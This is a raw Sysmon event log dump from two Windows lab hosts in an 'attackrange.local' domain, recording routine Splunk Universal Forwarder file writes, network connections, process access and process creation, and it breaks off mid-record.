AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F53DDF1EA6531836D99B49C7AFE7BA4,SHA256=E8ACD32591D13EAD64AC5CCF7B28311194A7A09BDE6F8E3E76D62D1B1DA8192D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000108679Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:55.372{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51983-false10.0.1.12-8000- 23542300x8000000000000000108678Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:56.093{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=546E3D147281E955FC35068B549DFB3E,SHA256=EDBF7BC13E9328BB2D2A976590A4C90963A48CFFA8D4E3EE6A15A4AF6C05A57C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084176Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:57.744{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA932B6A17CD634A979C3FDB02F4B054,SHA256=071A97F008A7E743588559E557F705BAB3CCD3F606C6D8B36679B61E94771A38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108681Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:57.111{58E9C193-ACB4-615A-2F00-00000000FC01}1712NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=0DE8A333C5FD1740BE6882387E7A5A2B,SHA256=A5B175F730F9666E64AD37BBFDA51EEEB5E907D1D3D0F46F0AAC40581BD0C903,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108680Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:57.111{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1468917EA1BA6F525D7F07B941C23677,SHA256=14DDEE0E024B92B7FAD7740C56800048F06231CB26CE611EF458A9B297E982B3,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000084175Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:54.783{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50218-false10.0.1.12-8000- 10341000x800000000000000084190Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:58.900{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B5E6-615A-B101-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084189Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:58.900{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084188Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:58.900{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084187Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:58.900{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084186Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:58.900{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084185Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:58.900{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084184Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:58.900{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084183Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:58.900{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084182Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:58.900{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084181Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:58.900{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084180Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:58.900{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B5E6-615A-B101-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000084179Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:58.900{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B5E6-615A-B101-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000084178Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:58.901{2FDD8D40-B5E6-615A-B101-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000084177Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:58.744{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEAD3778B547829277B267EA17D3B436,SHA256=CB980B0E2127D15CE28750A6B912B56E69CF192F938C832526FBB57046F701D8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000108691Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:58.640{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B5E6-615A-9602-00000000FC01}7476C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108690Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:58.640{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108689Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:58.640{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108688Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:58.640{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108687Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:58.640{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108686Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:58.640{58E9C193-ACA4-615A-0500-00000000FC01}412528C:\Windows\system32\csrss.exe{58E9C193-B5E6-615A-9602-00000000FC01}7476C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000108685Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:58.640{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B5E6-615A-9602-00000000FC01}7476C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000108684Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:58.641{58E9C193-B5E6-615A-9602-00000000FC01}7476C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000108683Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:57.358{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51984-false10.0.1.12-8089- 23542300x8000000000000000108682Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:58.125{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CD0645F87583C0006FFF68AA6E244C0,SHA256=EDF8A61F4B25467B57AA46B48B8B328BCEABFE7013021E14A7F8D2276BCBD724,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084191Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:59.744{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AC1359166D70A18E757185BDB834BA1,SHA256=BB06BFEF2FCF66825028C000252194221D73FF3D4FA9F9CA4D0D015E184A7543,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000108705Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:59.479{58E9C193-B5E7-615A-9702-00000000FC01}81808168C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program 